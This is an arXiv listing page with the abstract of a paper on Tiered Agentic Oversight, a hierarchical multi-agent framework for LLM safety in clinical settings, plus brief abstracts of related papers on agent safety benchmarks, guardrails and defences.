Tiered Agentic Oversight: A Hierarchical Multi-Agent System for AI Safety in Healthcare
- URL: http://arxiv.org/abs/2506.12482v1
- Date: Sat, 14 Jun 2025 12:46:10 GMT
- Title: Tiered Agentic Oversight: A Hierarchical Multi-Agent System for AI Safety in Healthcare
- Authors: Yubin Kim, Hyewon Jeong, Chanwoo Park, Eugene Park, Haipeng Zhang, Xin Liu, Hyeonhoon Lee, Daniel McDuff, Marzyeh Ghassemi, Cynthia Breazeal, Samir Tulebaev, Hae Won Park,
- Abstract summary: Tiered Agentic Oversight (TAO) is a hierarchical multi-agent framework that enhances AI safety through layered, automated supervision.<n>Inspired by clinical hierarchies (e.g., nurse, physician, specialist), TAO conducts agent routing based on task complexity and agent roles.
- Score: 43.75158832964138
- License: http://arxiv.org/licenses/nonexclusive-distrib/1.0/
- Abstract: Current large language models (LLMs), despite their power, can introduce safety risks in clinical settings due to limitations such as poor error detection and single point of failure. To address this, we propose Tiered Agentic Oversight (TAO), a hierarchical multi-agent framework that enhances AI safety through layered, automated supervision. Inspired by clinical hierarchies (e.g., nurse, physician, specialist), TAO conducts agent routing based on task complexity and agent roles. Leveraging automated inter- and intra-tier collaboration and role-playing, TAO creates a robust safety framework. Ablation studies reveal that TAO's superior performance is driven by its adaptive tiered architecture, which improves safety by over 3.2% compared to static single-tier configurations; the critical role of its lower tiers, particularly tier 1, whose removal most significantly impacts safety; and the strategic assignment of more advanced LLM to these initial tiers, which boosts performance by over 2% compared to less optimal allocations while achieving near-peak safety efficiently. These mechanisms enable TAO to outperform single-agent and multi-agent frameworks in 4 out of 5 healthcare safety benchmarks, showing up to an 8.2% improvement over the next-best methods in these evaluations. Finally, we validate TAO via an auxiliary clinician-in-the-loop study where integrating expert feedback improved TAO's accuracy in medical triage from 40% to 60%.
Related papers
- WebGuard: Building a Generalizable Guardrail for Web Agents [59.31116061613742]
WebGuard is the first dataset designed to support the assessment of web agent action risks.<n>It contains 4,939 human-annotated actions from 193 websites across 22 diverse domains.
arXiv Detail & Related papers (2025-07-18T18:06:27Z) - OpenAgentSafety: A Comprehensive Framework for Evaluating Real-World AI Agent Safety [58.201189860217724]
We introduce OpenAgentSafety, a comprehensive framework for evaluating agent behavior across eight critical risk categories.<n>Unlike prior work, our framework evaluates agents that interact with real tools, including web browsers, code execution environments, file systems, bash shells, and messaging platforms.<n>It combines rule-based analysis with LLM-as-judge assessments to detect both overt and subtle unsafe behaviors.
arXiv Detail & Related papers (2025-07-08T16:18:54Z) - ALRPHFS: Adversarially Learned Risk Patterns with Hierarchical Fast \& Slow Reasoning for Robust Agent Defense [7.923638619678924]
Existing defenses rely on "Safety Checks", which struggle to capture the complex semantic risks posed by harmful user inputs or unsafe agent behaviors.<n>We propose a novel defense framework, ALRPHFS (Adversarially Learned Risk Patterns with Hierarchical Fast & Slow Reasoning)<n>ALRPHFS consists of two core components: (1) an offline adversarial self-learning loop to iteratively refine a generalizable and balanced library of risk patterns, and (2) an online hierarchical fast & slow reasoning engine that balances detection effectiveness with computational efficiency.
arXiv Detail & Related papers (2025-05-25T18:31:48Z) - PeerGuard: Defending Multi-Agent Systems Against Backdoor Attacks Through Mutual Reasoning [8.191214701984162]
Multi-agent systems leverage advanced AI models as autonomous agents that interact, cooperate, or compete to complete complex tasks.<n>Despite their growing importance, safety in multi-agent systems remains largely underexplored.<n>This work investigates backdoor vulnerabilities in multi-agent systems and proposes a defense mechanism based on agent interactions.
arXiv Detail & Related papers (2025-05-16T19:08:29Z) - Toward Automated Regulatory Decision-Making: Trustworthy Medical Device Risk Classification with Multimodal Transformers and Self-Training [3.439579933384111]
Transformer-based framework integrates textual descriptions and visual information to predict device regulatory classification.<n>Our approach achieves up to 90.4% accuracy and 97.9% AUROC, significantly outperforming text-only (77.2%) and image-only (54.8%) baselines.
arXiv Detail & Related papers (2025-05-01T09:41:41Z) - AegisLLM: Scaling Agentic Systems for Self-Reflective Defense in LLM Security [74.22452069013289]
AegisLLM is a cooperative multi-agent defense against adversarial attacks and information leakage.<n>We show that scaling agentic reasoning system at test-time substantially enhances robustness without compromising model utility.<n> Comprehensive evaluations across key threat scenarios, including unlearning and jailbreaking, demonstrate the effectiveness of AegisLLM.
arXiv Detail & Related papers (2025-04-29T17:36:05Z) - D-CIPHER: Dynamic Collaborative Intelligent Multi-Agent System with Planner and Heterogeneous Executors for Offensive Security [22.86304661035188]
D-CIPHER is a multi-agent framework for collaborative cybersecurity CTF solving.<n>It integrates agents with distinct roles with dynamic feedback loops to enhance reasoning on complex tasks.<n>It achieves state-of-the-art performance on three benchmarks: 22.0% on NYU CTF Bench, 22.5% on Cybench, and 44.0% on HackTheBox.
arXiv Detail & Related papers (2025-02-15T23:43:18Z) - Agent-SafetyBench: Evaluating the Safety of LLM Agents [72.92604341646691]
We introduce Agent-SafetyBench, a benchmark designed to evaluate the safety of large language models (LLMs)<n>Agent-SafetyBench encompasses 349 interaction environments and 2,000 test cases, evaluating 8 categories of safety risks and covering 10 common failure modes frequently encountered in unsafe interactions.<n>Our evaluation of 16 popular LLM agents reveals a concerning result: none of the agents achieves a safety score above 60%.
arXiv Detail & Related papers (2024-12-19T02:35:15Z) - On the Resilience of LLM-Based Multi-Agent Collaboration with Faulty Agents [58.79302663733703]
Large language model-based multi-agent systems have shown great abilities across various tasks due to the collaboration of expert agents.<n>The impact of clumsy or even malicious agents--those who frequently make errors in their tasks--on the overall performance of the system remains underexplored.<n>This paper investigates what is the resilience of various system structures under faulty agents on different downstream tasks.
arXiv Detail & Related papers (2024-08-02T03:25:20Z)
This list is automatically generated from the titles and abstracts of the papers in this site.
This site does not guarantee the quality of this site (including all information) and is not responsible for any consequences.